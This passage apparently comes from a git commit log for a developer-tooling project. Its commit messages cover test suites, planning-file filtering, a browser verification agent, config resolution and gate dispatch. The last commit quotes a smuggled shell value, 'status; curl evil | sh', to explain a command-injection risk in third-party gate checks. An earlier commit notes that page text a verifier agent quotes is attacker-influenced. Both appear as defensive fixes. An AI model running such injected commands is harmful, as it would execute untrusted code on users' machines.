* test(#2971): failing-first suite for the pr-branch planning-path filter Binds the not-yet-built planning.pr_strict mode and the corrected filter recipe for /gsd-pr-branch across six layers: pure classification and forbidden-path predicates, real-git fixtures that run the cherry-pick filter loop end to end, config-key registration through the real CLI and both manifests, the executed worktree-materialization claim the issue's triage asked to establish, fast-check properties over arbitrary path sets, and a drift guard over the shipped workflow. Two live defects in today's shipped recipe are pinned as regressions, both reproduced empirically first: `git rm -r --cached` stages a deletion of any .planning/ path the target branch already tracks, so the generated PR removes the base branch's planning files; and the same command leaves the cherry-picked file untracked on disk, so a second commit touching that path aborts the pick with "untracked working tree files would be overwritten" and every remaining commit is silently dropped. The test helper parses the canonical path lists out of gsd-core/workflows/pr-branch.md rather than restating them, so the workflow stays the single source of truth and the suite cannot drift from what ships. Refs #2971 * feat(#2971): strict planning filter mode for /gsd-pr-branch Adds planning.pr_strict — a boolean, default false, that selects what /gsd-pr-branch means by "filtered". Default mode is unchanged: structural planning state survives into the PR branch and the nine transient subdirectories do not. Strict mode drops every .planning/ path, structural files included, and carries a commit over only when it touches at least one file outside .planning/. Strict mode is what makes planning.commit_docs: true safe for a project that versions its planning tree locally but publishes none of it. The alternative posture, commit_docs: false, silently costs parallel executor isolation — a worktree is checked out from a commit, so an untracked or ignored .planning/ is simply absent inside it and the executor has no PLAN.md to read. That claim is now established by an executed fixture rather than inherited. The two path lists are declared once and both projections derived from them, so create_pr_branch and verify can no longer disagree about what the filter promised. verify previously counted every .planning/ path against a documented success criterion of zero while create_pr_branch was specified to preserve five structural files, so a correct run reported itself as failed on every phase that touched STATE.md — which is every phase. It now asserts against the active mode, and names the .planning/ paths default mode deliberately keeps rather than trading a wrong signal for silence. Two verified defects in the same recipe are fixed alongside, because strict mode would have amplified both. `git rm -r --cached` staged a deletion for any .planning/ path the target branch already tracked, so the generated PR removed the base branch's planning files — under strict mode that would have been the entire tree. The same command left the picked file untracked on disk, so a second commit touching that path aborted the cherry-pick with "untracked working tree files would be overwritten" and every remaining commit was silently dropped. Both were reproduced against real git before being fixed. The filter now forces excluded paths back to what the PR branch's HEAD carries, in the index and the working tree; a conflict outside the filter halts instead of being improvised past; a commit left empty by filtering is skipped rather than failing. A clean-working-tree precondition makes the worktree half safe. Closes #2971 * fix(#2971): unwind the checkout on a conflict halt, and test the real recipe Two review findings, both fixed in place. The isolated adversarial pass found that the conflict-outside-the-filter branch exited while leaving the user checked out on the half-built PR branch with cherry-pick state still live — this loop runs in the user's own working directory, so stranding them there is a real cost even though it is not a vulnerability. The branch now aborts the pick, returns to the original branch, removes the partial PR branch, and says so before exiting. The standards pass found the L2 fixtures executed a hand-written mirror of the cherry-pick filter recipe rather than the recipe itself, so a reordering in the workflow would not have been caught — and the order is load-bearing, since restoring a path from HEAD before removing it inverts the filter. The helper now extracts the canonical loop from the shipped workflow and the fixtures execute that verbatim, which also gives the conflict-halt unwind above real coverage. The drift guard additionally pins the two commands' relative order and asserts the workflow carries exactly one canonical loop. Also records the publication gate in the CONTEXT.md glossary next to the commit gate it is distinct from. Refs #2971 * fix(#2971): make the conflict-halt unwind actually unwind, and use the colon slash form The remote matrix caught two defects in the previous commit. The halt path claimed to restore the original branch but did not. `git cherry-pick --abort` does not apply to a single `--no-commit` pick with no sequencer file, and the fallback left the unmerged index in place, which makes `git checkout` refuse — a failure the `2>/dev/null || true` then swallowed, so the user was told they had been restored while still sitting on the half-built PR branch. The unwind now drops sequencer state, hard-resets the disposable PR branch to clear the unmerged index, and only claims a restore when the checkout actually succeeded; when it does not, it says where the user is and gives them the two commands to finish it by hand. Verified against real git: exit 1, the conflict named, HEAD back on the original branch, the partial branch gone, a clean tree and no CHERRY_PICK_HEAD. Two runtime-loaded source artifacts used the retired `/gsd-<cmd>` hyphen form, which names a command no runtime registers. The canonical authoring token for workflows and references is `/gsd:<cmd>`; docs keep the hyphen form, so the documentation added in this branch is unaffected. The comment in src/config.cts moves to the colon form too, since it propagates into the generated lib. Refs #2971 * docs(#2971): backfill PR number into the changeset fragments (#3720) --------- Co-authored-by: sim <sim@local> |
||
|
|
14679b866b |
enhance(#2856): add default-off live-DOM UAT capability (#3716)
* test(#2856): add failing-first suite for the live-dom-uat capability Binds the approved triage shape before any of it exists: - containment — the execute:wave:post hook must not render unless workflow.live_dom_uat is true AND the capability resolves active (fail-closed on a missing state entry, and on a non-boolean value) - criterion 4 — agents/gsd-executor.md carries no browser MCP family; asserted as an absence, which is the only way it is observable - Hyrum guard — the pre-existing mcp__playwright__* branch must stay outside the key-gated block, or upgrading silently removes working automated UI verification for every current Playwright-MCP user - parity — the browser glob list now lives in two surfaces (agent frontmatter + workflow detection block); the assertion fails if either gains or loses a family without the other Red by construction: the capability, agent and workflow block do not exist yet. Verified on the remote runner. Refs #2856 * enhance(#2856): add default-off live-DOM UAT capability A phase whose acceptance criteria needed a live DOM could not be finished by the agent that executed it: gsd-executor carries no browser tools, so it correctly returned checkpoint:human-action even though the work was not human-only, just tool-less. Every such phase degraded to "executed, then finished by hand in the orchestrator", and autonomous: false could not distinguish "a human must judge this" from "the executor lacks the tool". Implements the shape approved at triage, not the one reported. The executor's tools: line is NOT widened, in any configuration: for a first-party agent the static list is the only control that exists (ADR-1244 D2, ADR-857 D4, no per-dispatch override). Instead one default-off capability owns the key, the agent, and the step: - capabilities/live-dom-uat/ — activationKey workflow.live_dom_uat (boolean, default false), one additive step at execute:wave:post (onError: skip, gates: []), so it can never halt a wave - agents/gsd-dom-verifier.md — the only GSD agent carrying browser MCP globs, in its own tools: line, with no Bash - verify-work automated_ui_verification — a gsd:live-dom-families block naming both new families AND the key; presence alone never activates Two independent fail-closed gates: isCapabilityActive renders a hook only on state.active === true, plus the step's own `when`. The pre-existing mcp__playwright__* branch keeps the gating it already had and stays outside the new block. Pulling it behind a default-off key would have silently removed working automated UI verification from every current Playwright-MCP user on upgrade. Also closes a host gap this surfaced: execute:wave:post dispatched only contribution + gate, so ANY registered step was declared and silently never run — exactly the single-kind hand-roll loop-hook-dispatch.md names. Step 5.75 now dispatches every kind == "step". The browser-profile lock is tolerated, not coordinated: --isolated is a flag on the operator's own MCP-server registration that GSD neither launches nor parameterizes, so the verifier reports could_not_look / profile_locked, names the flag, and stops. DOM-VERIFY.md keeps could_not_look and nothing_to_report distinct behind a closed reason enum — collapsing them is the ambiguous-run-notes defect reported. Verified on the remote runner. Closes #2856 * fix(#2856): apply review findings from the orthogonal passes Correctness pass (blocker): - delete detectionBlockIsCrlfSafe. It was pass-always: it read the file, replaced LF with CRLF, then indexOf'd marker strings that contain no newline, so the replacement could not change the result and the assertion could never fail for the reason it stated. There is no real CRLF risk on this surface either — the gsd:live-dom-families block has no parser, only human and agent readers. Deleted rather than replaced, per the repo's pass-always-test rule. Isolated security pass (two minors, both real): - execute-phase.md step 5.75: this change is what first activates kind == "step" dispatch at execute:wave:post, which newly opens the ref.command shell path at that loop point. Our own step uses ref.agent and never touches it, but the door is now open, so the step-dispatch line carries the same in-context validate-before-shell warning the sibling gate-dispatch line directly below it already carries. - gsd-dom-verifier: quoted page text in DOM-VERIFY.md is attacker influenced. Require it wrapped in inline code or a fence, kept short, and never left reading as a directive to the next reader. Verified on the remote runner. Refs #2856 * fix(#2856): settle the new-agent roster ripple Checkpoint 2 returned 28 failures, none in the new suite — all of them the guards that exist to make adding an agent a deliberate act. Each is a real boundary that had to move: - docs/AGENTS.md: Tools row must copy the frontmatter verbatim (#2526), so the browser globs lose their backticks; primary-agent counts 21->22, roster 33/34->34/35, Verifiers category 1->2 - docs/INVENTORY.md: roster completeness requires every agents/gsd-*.md to be classified exactly once - gsd-dom-verifier: add the anti-heredoc instruction and the commented hooks: frontmatter pattern both agent gates require - gsd-core/bin/shared/model-catalog.json: every shipped agent needs a profile entry (#3229) - copilot-install / kilo-upgrades / qwen-upgrades: expected agent list and the 34->35 roster boundary - execute-wave-post-gate-pipeline-e2e: execute:wave:post legitimately carries one step now. Asserted as an exact shape — one step, capId live-dom-uat, ref.agent gsd-dom-verifier, onError skip — so it stays a real guard against accidental change rather than being relaxed Two findings worth naming: mcp-tool-inheritance (#2526) rejected the agent for documenting mcp__playwright__* while its tools: line withholds it — a dead instruction that invites the agent to claim a path it cannot take. The prose now names the Playwright MCP family without the dispatchable token, in both the agent and the capability fragment. runtime-launcher-parity rejected the new gsd_run call: each fenced block is its own shell, so a workflow step file invoking gsd_run needs its own canonical preamble. Propagated with scripts/sync-runtime-launcher.cjs. That script also normalizes explore.md, which is unrelated pre-existing drift the parity check tolerates, so it is reverted to keep this diff scoped. The emitted-drift ack supersedes the spent #3370 entry for execute-phase.md — it is merged into next, so its ripple is absorbed at the base and it can no longer clear anything. That is the same supersede the #3370 entry itself performed on the spent #3324 fragment. Its unrelated execute-plan.md entry is untouched. Verified on the remote runner. Refs #2856 * fix(#2856): drop the stale emitted-drift ack entry The automated-ui-verification.md entry was written speculatively rather than from a reported growth, and the check names that precisely: an ack "written or reworded in THIS diff, but nothing here needed it, so it explains nothing". The growth tier keys on the bare filename as it appears under gsd-core/workflows/ or agents/. automated-ui-verification.md is nested under verify-work/steps/, so it was never in the tracked set — only execute-phase.md was ever reported, both before and after the launcher preamble landed. Only ack what the check actually reports. Verified on the remote runner. Refs #2856 * chore(#2856): backfill changeset pr number pr:0 -> 3716. The placeholder fails both changeset-lint (fail_invalid_fragment) and docs-lint (fail_malformed_fragment) by design and can only be resolved once the PR number exists. Both now report ok against GITHUB_BASE_REF=next. Refs #2856 --------- Co-authored-by: sim <sim@local> |
||
|
|
77fa08f1e8 |
fix(#2773): feed the spec-phase edge probe English-translated requirement text (#3713)
* test(#2773): failing-first contract and premise tests for translated edge-probe input Locks the Step 5.5 contract that a response_language project must feed the edge probe an English translation of each requirement's text, and binds that advice to measured engine behavior: the same requirement classifies to zero shapes in Portuguese and to collection/adjacency/empty/ordering in English. Also pins the honest limit — the issue's own repro sentence classifies to [] in English too, so translation is necessary but not sufficient and the authored shapes override is the documented fallback. Red before the doc change; the assertions are all false today. Refs #2773 * fix(#2773): feed the spec-phase edge probe English-translated requirement text The shape cues in src/edge-probe.cts are English word-boundary regexes, so a project running with response_language set wrote its SPEC requirements into the Step 5.5 $REQS_JSON heredoc in that language, matched no cue, classified to zero shapes, and landed every row in the unclassified sentinel (#1110). The taxonomy contributed nothing and --auto left it all unresolved — the probe was a silent no-op for exactly the spec type it exists to harden. Step 5.5 now states that the $REQS_JSON payload is engine input rather than user-facing output, so the response_language rule does not govern it: each requirement's text carries a faithful English translation, the SPEC keeps its original language, and requirement ids are never translated or renumbered. The instruction sits before the heredoc on purpose — the downstream APPLICABLE=0 warning fires only when every requirement is unclassified, so a partly-classified non-English spec would otherwise slip through with no signal at all. Measured against the compiled engine: the same requirement returns [] in Portuguese and collection -> adjacency/empty/ordering in English. Also measured: the issue's own repro sentence returns [] in English too, so translation is necessary but not sufficient — the instruction therefore points at the authored shapes override for prose carrying no cue in any language rather than promising that translation restores classification. Doc scope only, per the triage disposition on the issue. The compiled engine is untouched; the lang-hint / per-language cue-set fix is a separate follow-up. Closes #2773 * fix(#2773): clean up the edge-probe temp file on the placeholder-guard exit path Surfaced by the isolated security review of this branch. Between the mktemp and the unconditional cleanup, Step 5.5 has two sibling guards that disagreed about their own invariant: the engine-failure guard runs rm -f "$REQS_JSON" before exiting, while the empty/placeholder guard directly above it exited without one. A spec run that tripped the placeholder check therefore stranded a temp file holding the SPEC's requirement text in TMPDIR, once per failed run. The added contract test walks the region between the mktemp and the unconditional cleanup and asserts no exit path leaves the file behind, so the two guards can no longer drift apart. Proven to bind: run against the pre-fix file the walker reports the leaking exit; against the fixed file it reports none. Refs #2773 * docs(#2773): record the edge probe's English-cue input constraint in the predicate store The co-change gate flagged CONTEXT.md (13 co-changes with spec-phase.md) and docs/CONFIGURATION.md (11) as candidate-missing-updates, and both were real gaps rather than incidental coupling. CONTEXT.md's EdgeCompletenessProbeModule entry documents the input contract for classifyShape but did not record that SHAPE_CUES are English word-boundary patterns — so the predicate store implied text was language-agnostic, which is what a future agent reads before touching this seam. docs/CONFIGURATION.md's response_language row is what a non-English project reads when it turns the setting on; it now names the one deliberate exception and links to the FEATURES.md explanation, so the interaction is discoverable from the config key rather than only from the workflow. CONTEXT-INDEX.json regenerated via gen-context-index.cjs --write. The drift-ack fragment is updated for the final byte range and now also records the placeholder-guard cleanup fix folded into the same block. Refs #2773 * fix(#2773): append the growth rationale to the existing spec-phase.md ack entry The remote runner caught this: emitted-attribution.test.cjs pins the 0000-legacy-migration.json spec-phase.md entry permanently (the #2914 migration regression test asserts the exact '31987 -> 31997' delta text survives), so removing it to avoid a duplicate-key collision with a new fragment broke that test instead of satisfying the ratchet. The entry is an accreting log, not a single-use slot — #2733, #3132 and #3102 were each appended to the same reason string by later PRs, which is how a shared growth key coexists with the rule that two ack sources may never name the same path. This appends the #2773 rationale the same way and drops the separate fragment, whose spec-phase.md key was the collision. Verified locally by reproducing both affected tests against the real fragment before re-dispatching: the pinned delta survives, grown[0].acked is true, staleAcks is empty, and all 35 entries still read as spent. Refs #2773 * docs(#2773): add a how-to for probing edges in a non-English project The phase gate's enablementSequence check caught a wrong call of mine. I had recorded that no how-to was owed because the user takes zero extra steps — the workflow translates the probe input itself. Written out, though, the sequence from off to value is two steps and step 1 depends on response_language, a setting owned by a different capability than the edge probe, which is exactly the condition the how-to test names. There is also real task content a reference table cannot carry: the three-way split between a few unclassified rows (the classifier's recall gap), every row unclassified (the probe could not read the spec at all), and the silent partly-classified case where the APPLICABLE=0 warning never fires. That last one is what a user would otherwise misread as a clean bill of health. Shaped after the resolve-edge-coverage-findings / resolve-unreachable-guard siblings and indexed from docs/README.md next to its closest relative. Refs #2773 * chore(#2773): backfill the changeset PR number pr:0 placeholder replaced with the real PR number now that #3713 exists. Refs #2773 --------- Co-authored-by: sim <sim@local> |
||
|
|
2fca0e17e4 |
enhance(#2554): resolve code review depth from path-scoped override rules (#3695)
* test(#2554): failing-first suite for path-scoped code review depth overrides Binds the not-yet-built code-review-depth module: segment-aware path-prefix matching of a changed-file set against ordered {paths,depth} rules, resolution order flag > strongest matching rule > global > standard, typed validation errors, and the large-scope downgrade boundary. Also proves behaviorally that workflow.code_review_depth_overrides is not yet a registered config key. Refs #2554 * feat(#2554): resolve code review depth from path-scoped override rules Adds workflow.code_review_depth_overrides — an ordered array of {paths, depth} rules matched against a review's changed-file set by segment-aware path-prefix comparison. Resolution order is --depth= flag, then the strongest matching rule, then workflow.code_review_depth, then standard; a matching rule replaces the global rather than being max'd with it, so quick and standard rules stay meaningful. Glob metacharacters are a hard configuration error rather than sugar for a prefix, and malformed rules halt the review instead of degrading to standard. The resolver is pure and reports its own provenance, so the workflow can print the resolved depth and the rule that matched. The pre-existing >50-file deep-to-standard downgrade moves into the module and now names the rule it overrode. The key is registered centrally rather than as a capability config slice: the federated slice channel admits only boolean/string/number/enum, so an array slice would be dropped as malformed. Closes #2554 * test(#2554): correct depth-provenance assertions and pin out-of-repo paths Two corrections to the failing-first suite. The source assertion for a non-matching rule with no global configured expected 'config'; with no global set the depth comes from the default, and a companion assertion tolerated either value, so both passed against an implementation that derived provenance from whether any rules existed rather than from where the depth came from. The out-of-repo absolute-path case used a home-directory path that matched neither implementation, so it never exercised the defect it named. It now pins the discriminating cases: an absolute path outside the repo root must not match a repo-relative rule, and one under the root must. * docs(#2554): document path-scoped code review depth overrides Reference rows for workflow.code_review_depth_overrides in the configuration, features and commands references plus the locale copies that carry those tables, and in the planning-config reference. Explanation of why escalation is whole-review rather than per-file and why v1 is prefix-only. New how-to for scoping review depth by path, carrying the configuration-error reason table and the distinction between nothing to report and could not look. CONTEXT.md glossary entry and the INVENTORY row for the new CLI module. ja-JP and ko-KR CONFIGURATION.md carry no code_review keys at all, and ko-KR and pt-BR FEATURES.md carry no code-review config table, so those files are deliberately untouched. * fix(#2554): make the depth-misconfiguration halt executable and reject control chars Three review findings, all in this change. The misconfiguration halt was prose rather than shell: the error-printing fence was followed by an unconditional extraction fence, so an ok:false result threw and left the depth empty instead of stopping the review. Prose is not a guard — the two fences are now one block with a real conditional, and anything that is not the literal string true fails closed. An interior control character in a rule path survived validation and reached the provenance string and the summary box; rule paths now reject control characters via a new PATH_CONTROL_CHAR reason, after the glob check so precedence is unchanged. That in turn makes the field record safe to delimit, so the seven node invocations that each re-parsed the same result to read one field collapse to one. Also corrects the glossary entry's illustrative paths, which the glossary-ref check read as real repository references. * fix(#2554): use the fast-check v4 string API and acknowledge workflow growth Two failures from the remote matrix on d3111f45, both this branch's. The property block built its segment arbitrary with fc.stringOf, removed in fast-check v4. Because the arbitrary is constructed in the describe body, the throw took out all four property tests rather than one — they had never executed. Rewritten to fc.string({unit, ...}), the form this repo already uses in emitted-attribution.test.cjs. Every other fast-check helper in the file was audited against the installed module. The emitted-attribution growth arm needed an acknowledgment for code-review.md, which grew 5376 bytes. The pre-existing 3503 fragment keying the same file is spent — its ripple was absorbed when #3503 merged, and the base file is exactly the 34435-byte baseline this growth is measured against — so it cannot clear anything, while the ack lint hard-fails on a duplicate key across two sources. Removed it in favor of the new fragment, which is exactly how #3503 itself replaced the spent 3191 fragment. * docs(#2554): backfill changeset PR number --------- Co-authored-by: sim <sim@local> |
||
|
|
79781e68eb |
enhance(#2401): ground verify-command paths and inherit prior-phase commands (#3678)
* feat(#2401): ground <automated> verify-command paths and inherit prior-phase commands Adds a deterministic resolvability probe over each PLAN.md <automated> verify command and surfaces the nearest prior phase's proven commands to the planner at every context window. - src/verify-command-grounding.cts: recognizer (not a shell interpreter) that grounds a leading cd <literal> chain and npm --prefix <literal>, and reports unresolvable rather than guessing. Never executes command text. - gsd-tools check verify-command-paths <N>: per-phase probe, wired into plan-phase.md before the plan-check pass. - init.plan-phase gains prior_verify_commands, ungated by context_window. - gsd-plan-checker: new Verify Command Path Resolvability dimension that reports the failing target and never prescribes a replacement. Also fixes first-match-wins prefix bucketing in scripts/lint-test-file-count.cjs (readdir order is not stable across platforms, so a module whose name extends another's with a hyphen bucketed differently on Linux than on macOS). Closes #2401 Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2401): ground the canonical --prefix form, quoted paths, and absolute cd resets Independent review found three defects in the recognizer: - npm --prefix DIR run SCRIPT never reached the script-existence check, because the pattern required npm and run to be adjacent. That is the form the docs tell planners to prefer, so script_missing never fired for it. The prefix flag and its value are now stripped before matching. - --prefix captured with \S+, so a quoted path containing a space was truncated to a stray opening quote and reported as a missing directory - a false blocker, worse than the bug this feature fixes. The capture is now quote-aware. - A chained cd whose later segment was absolute concatenated instead of resetting, producing a nonsense path and another false blocker. The fold now resets on an absolute segment. Also replaces the bespoke phase-directory regex with the canonical phase-id helpers. Real phase directories are NN-slug, not phase-N-slug, so the prior-command harvest matched nothing outside its own fixtures and the planner-inheritance half of this feature was dead code. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * refactor(#2401): source task blocks from the canonical sectionizer The module carried its own copy of the <task>-block grammar - a fourth hand-rolled mirror of the one markdown-sectionizer owns. verify.cts keeps its copy only because it needs the type= attribute the canonical helper discards; this module never reads that attribute, so it can share the owner outright instead of adding a test around a copy. extractAutomatedCommands now takes task bodies from extractTaggedBlocks and the out-of-task remainder from stripTaggedBlocks. A task-grammar parity test pins the attributed task-name set against the canonical helper across six awkward task shapes. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * fix(#2401): extract agent-file overflow to references and repair the property arbitrary The remote matrix run came back red with 19 failures, four root causes: - agents/gsd-plan-checker.md and agents/gsd-planner.md both blew the 49152 agent cap. Their bodies move to gsd-core/references/, leaving @-reference stubs, per the documented overflow pattern. - The new checker dimension invoked gsd_run before the canonical preamble that defines it. The call is deleted outright: plan-phase.md already runs the probe and hands the result in as {VERIFY_PATHS}, so the dimension consumes that rather than re-running anything. - fc.fullUnicodeString does not exist in fast-check 4.8.0. Replaced with fc.string({ unit: 'binary' }), which covers the same 0000-10FFFF range. - Three runtime-loaded files grew; acknowledged in the existing ack fragments that already own those bare filenames, since two ack sources may never name the same path. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * test(#2401): regenerate golden install-tree fixtures for the new references Adding two files under gsd-core/references/ changes what the installer emits into every runtime's tree, so all 19 golden install-parity fixtures went stale. Regenerated with npm run gen:install-tree; the delta is exactly the two new reference paths per runtime, no removals. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> * chore(#2401): backfill changeset pr number to 3678 * fix(#2401): treat ~ as a home expansion only at the start of a path Windows CI caught this on both shards; the Linux-only remote matrix cannot see it. The dynamic-path refusal rejected ~ anywhere, and a GitHub Windows runner's tmpdir is an 8.3 short name - C:\Users\RUNNER~1\AppData\Local\Temp - so a valid absolute Windows path came back unresolvable/dynamic_path. This was a production bug, not a test artifact: any Windows user whose project path carries an 8.3 short name, or any literal ~, silently lost the probe entirely - every command degrading to unresolvable with no explanation. ~ is a home expansion only at the start of a path; elsewhere it is an ordinary literal. The check is now split: $, backtick, *, ? and newline stay refused anywhere (substitution and globs, and the glob characters are illegal in Windows path components regardless), while ~ is refused only leading, tolerating one leading quote since the check runs before quote stripping. The prior tests only caught this on Windows because only Windows puts a ~ in tmpdir. Four new tests pin it on every platform via a fixture directory literally named RUNNER~1. Co-Authored-By: Claude Opus 5 <noreply@anthropic.com> --------- Co-authored-by: sim <sim@local> Co-authored-by: Claude Opus 5 <noreply@anthropic.com> |
||
|
|
9de4d67118 |
fix(#3579): a pointer-less session inherits the repo active-workstream marker (#3616)
* test(3579): failing-first coverage for repo-marker inheritance A session that carries an identity but has never run 'workstream use' reads an absent session pointer, resolves null, and composes the flat .planning tree even when .planning/active-workstream names a live workstream. These tests fail on that and pin the invariants the fix must not break: a session with its own pointer is never repointed, and a session that merely lacked a pointer must never clear the shared marker on another session's behalf. * fix(3579): a pointer-less session inherits the repo active-workstream marker RED proven at 157cae26: the three inheritance tests failed while every isolation and negative control passed on base — the gap, and nothing else. pickActiveWorkstreamAdapter returned exactly ONE adapter: the session-scoped one whenever a session key existed, so the shared .planning/active-workstream marker was never consulted. getWorkstreamSessionKey resolves a key from ~13 env vars or the controlling TTY, so on any normal interactive terminal a key almost always exists — which is why a session that had never run 'workstream use' read an absent pointer, resolved null, and composed the FLAT planning tree even though the repo marker named a live workstream. Reads misreported; writes corrupted the superseded flat STATE. Silent, because the stale tree is well-formed. This was a genuine design fork, not an oversight: references/workstream-flag.md documented step 4 as a fallback 'when no session key exists', and the session isolation that buys is deliberate (#2850). The issue's Agent Brief left the choice open and said the reference doc should match whatever semantics ship. The maintainer ruled in chat for inheritance. Resolution now walks an ORDERED chain — session adapter first, shared second — and only a null from the session adapter falls through to the marker. Strictly additive: it can only turn a null into a name, never change a name that already resolves. The dangerous part is clear() ownership. resolveFromChain treats chain[0] as owned: only it is ever cleared, and only under selfHeal (getActiveWorkstream, never peek). An INHERITED marker is read-only — a stale value there resolves null and the file is left alone. Without that, one pointer-less session's read would delete the repo marker for every other session, which is a worse bug than the one being fixed. Covered by a test that asserts the marker still exists on disk after such a read. peekActiveWorkstream inherits but still mutates nothing (#2850 — the statusline draws on every render). references/workstream-flag.md's Resolution Priority is rewritten to match, keeping the session-isolation rationale and noting that inheritance does not weaken it: a session that owns a pointer is never repointed. Fixes #3579 * fix(3579): correct the guard diagnostics and lock the clear-semantics Three review passes; every finding fixed inline. MISSING ACCEPTANCE CRITERION (spec pass). The brief requires refusal diagnostics that distinguish 'marker present but the session lookup missed it' from 'no workstream set at all', and the two workstream-mode fail-safe guards were byte-for-byte untouched — still emitting a generic 'no active workstream is set' even when a marker exists and merely names a missing directory. Both guards (cmdPhaseComplete, cmdInitProgress) now branch on a new read-only diagnoseUnresolvedActiveWorkstream, which reuses the SAME resolvesToExistingWorkstream predicate resolveFromChain uses, so the diagnosis and the resolution cannot disagree. Two typed reasons added to ERROR_REASON; both arms still refuse — the fail-closed behavior is unchanged, only the message is now true. REAL TEST FAILURE, not a flake. The remote run failed 'clearing one session does not clear another session pointer'. That describe uses before() rather than beforeEach, so one tmpDir is shared and an earlier test writes active-workstream=beta into it; under inheritance the just-cleared session picks that marker up and resolves beta instead of null. The failure is a CORRECT consequence of Option A surfaced through an order-dependent fixture. The test now establishes its own marker state explicitly — its real intent (clearing A must not disturb B's pointer) is preserved and not weakened — and a new test pins the semantic deliberately: clearing a session pointer returns that session to INHERITING the marker, it does not force flat mode. Documented in references/workstream-flag.md, including how to actually get flat behavior. Also from review: partial activeWorkstreamAdapters injection no longer silently synthesizes a REAL filesystem adapter for the missing half (a latent test-isolation trap); the duplicated validate-then-existsSync logic is factored into one predicate; and the two try/finally test bodies are converted to t.after per CONTRIBUTING. New coverage: whitespace/empty shared marker; a session whose OWN pointer is stale while the marker names a different valid workstream (must self-heal to null, never inherit — the isolation guarantee at its sharpest); and both new diagnostic arms asserted on structured --json-errors output rather than prose. * fix(3579): read resolvability with the non-mutating peek, not the self-healing resolver Three of our own new tests failed on 7f5e706a. All three had ONE root cause, and none was fixed by relaxing an assertion. gsd-tools.cjs's bootstrap called the MUTATING getActiveWorkstream unconditionally on every invocation, purely to populate routing env. On an unresolvable pointer that self-healed — cleared it — BEFORE the dispatched command ran its own resolution. A second read in the same process then observed already-cleared state: - Isolation violation: a session whose own pointer was stale had it cleared by the bootstrap, so cmdWorkstreamGet's own resolution found a pointer-LESS session and inherited the shared marker ('beta' instead of null). Exactly the guarantee #2850 exists to protect, defeated across two calls rather than within one. - Guard diagnostics: the guards' own truthiness check also used the mutating resolver, so it cleared the invalid marker and the immediately-following read-only diagnosis found nothing and reported none_active instead of marker_unresolved. So a single invocation's answer depended on how many times it resolved. The bootstrap self-heal is PRE-EXISTING and was harmless while pointer-less meant flat — inheritance is what made it answer-changing, so this fix belongs here. Every call site that only CHECKS resolvability — the bootstrap, both fail-safe guards' truthiness check, and two informational init report fields — now uses the non-mutating peekActiveWorkstream. Self-heal is unchanged in active-workstream-store and still fires exactly once, at whichever site actually consumes the workstream. Verified by driving the real CLI against temp fixtures, since the suite cannot run locally: stale-own-pointer resolves null with the marker intact; both guard arms report marker_unresolved with missing_workstream_dir / invalid_name and the marker survives; no-marker still reports none_active; identity-less self-heal still deletes an invalid marker byte-identically to pre-#3579; and a session with a valid own pointer still wins. * chore(3579): backfill changeset PR number (#3616) * test(3579): kill the surviving mutants in the new resolution code CI's Stryker gate failed: active-workstream-store scored 79.45% against a break threshold of 80 — 259 killed, 67 survived, at 'Ran 1.00 tests per mutant on average'. The survivors cluster in the code this PR added (pickActiveWorkstreamAdapterChain, resolvesToExistingWorkstream, resolveFromChain, diagnoseUnresolvedActiveWorkstream): the CLI-level tests exercise those paths but do not DISCRIMINATE their branches, which is precisely what a surviving mutant means. Raised by strengthening assertions, never by touching the threshold. 21 unit tests added to the existing unit suite, each written to fail under a specific named mutant, using the module's injected adapter seams and createMemoryPointerAdapter so they stay hermetic under Stryker's per-mutant reruns: - chain shape with and without a session key, asserting length AND element identity (kills the if(false), the ': []' array mutant, and the block removal) - partial adapter injection, asserting the missing half is an inert memory adapter that never touches the filesystem (kills the three '??' -> '&&' mutants) - both arms of '!name || !validateWorkstreamName(name)' as SEPARATE tests — an absent name and a non-empty invalid one — which is what kills the '||' -> '&&' mutant - self-heal discrimination: getActiveWorkstream must clear an unresolvable owned pointer and peekActiveWorkstream must not, asserted on adapter state after each (kills if(selfHeal) -> if(true)) - fallback arm both ways: a fallback that resolves and one that does not - diagnoseUnresolvedActiveWorkstream asserted as a full object per case, with the reason strings compared exactly (kills present:true -> false and both StringLiteral mutants) One mutant is deliberately left: 'if (chain.length === 0)' -> 'if (false)'. The branch is structurally unreachable — the only chain source always returns a 1- or 2-element array literal — and resolveFromChain is not exported. Killing it would mean exporting an internal or deleting a defensive guard; neither is worth doing for a mutant, and the score clears 80 without it. Recorded here rather than left unexplained. Every new assertion was evaluated against the built module with real fixtures before committing, since the suite cannot run locally. --------- Co-authored-by: sim <sim@local> |
||
|
|
fba3b9c24f |
fix(#3559): dispatch every ship:pre capability gate, not two hardcoded capIds (#3608)
* test(3559): failing-first coverage for generic ship:pre gate dispatch ship.md's preflight resolves every active ship:pre gate then enforces exactly two hardcoded capability IDs, so a third-party capability's blocking gate is resolved, evaluable, and silently dropped. These tests fail on that dispatch dead-end and pin the generic evaluator contract the fix will drive. * fix(3559): dispatch every ship:pre gate generically, not two hardcoded capIds ship.md's preflight resolved every active ship:pre gate via render-hooks and then enforced exactly two capability IDs — security and broken-windows. Every other capId, including any third-party capability's blocking gate, was resolved, evaluable, and silently dropped: a phase shipped past its own declared failing gate with nothing evaluated and nothing warned. Preflight now iterates every active kind=="gate" entry in array order, dispatching by check shape through the generic evaluator (gsd_run check predicate, ADR-2008) and honoring each gate's own blocking and onError — the contract execute:wave:post, execute:post and plan:post already implement and references/loop-hook-dispatch.md already specifies. docs/how-to/command-exit-zero-gate.md already documented ship:pre as auto-dispatching, so this restores documented behavior rather than changing it. security and broken-windows are retained verbatim as named specializations INSIDE the loop, so their bespoke fail-closed reads are unchanged and every gate is visited exactly once — no double-enforcement is representable. Also corrects two CONTEXT.md predicates that described the hardcoded shape, and the test file's header note claiming ship:pre has no runnable evaluator (stale since #2008). Fixes #3559 * fix(3559): validate third-party gate checks in-context before any shell use Adversarial + security review of the generic dispatch arm this PR introduces. SECURITY (introduced by this PR): the new every-other-capId arm is the first path on which a THIRD-PARTY capability manifest string reaches a shell at ship:pre — before it, dispatch never left the two first-party arms. gates[].check is not one of the four executable surfaces the install consent prompt discloses (hooks, command modules, mcpServers, reviewer lanes), so a capability can be consented to as declarative-only and still reach a shell here. An unvalidated check.query of 'status; curl evil | sh' would be interpolated straight into a command substitution. The arm now carries the same in-context validation contract 